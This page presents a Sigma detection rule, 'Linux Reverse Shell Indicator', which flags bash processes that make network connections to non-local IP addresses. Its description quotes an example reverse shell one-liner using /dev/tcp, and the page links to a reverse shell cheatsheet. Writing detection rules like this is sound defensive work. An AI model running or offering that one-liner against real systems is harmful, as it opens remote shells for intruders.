This website uses cookies to ensure you get the best experience.
Got it!
Register
|
Login
Menu
Home
Sigma Rules
Splunk Rules
Explore Rules
Analytic Stories
MITRE ATT&CK
Overview
Matrix
Techniques
Groups
Software
Campaigns
Search
About
Linux Reverse Shell Indicator
Original Source:
[Sigma source]
Title:
Linux Reverse Shell Indicator
Status:
test
Description:
Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
References:
-https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
Author:
Florian Roth (Nextron Systems)
Date:
2021-10-16
modified:
2022-12-25
Tags:
-'attack.execution'
-'attack.t1059.004'
Logsource:
product: linux
category: network_connection
Detection:
selection:
Image|endswith
:
'/bin/bash'
filter:
DestinationIp
:
-'127.0.0.1'
-'0.0.0.0'
condition
:
selection and not filter
Falsepositives:
-Unknown
Level:
critical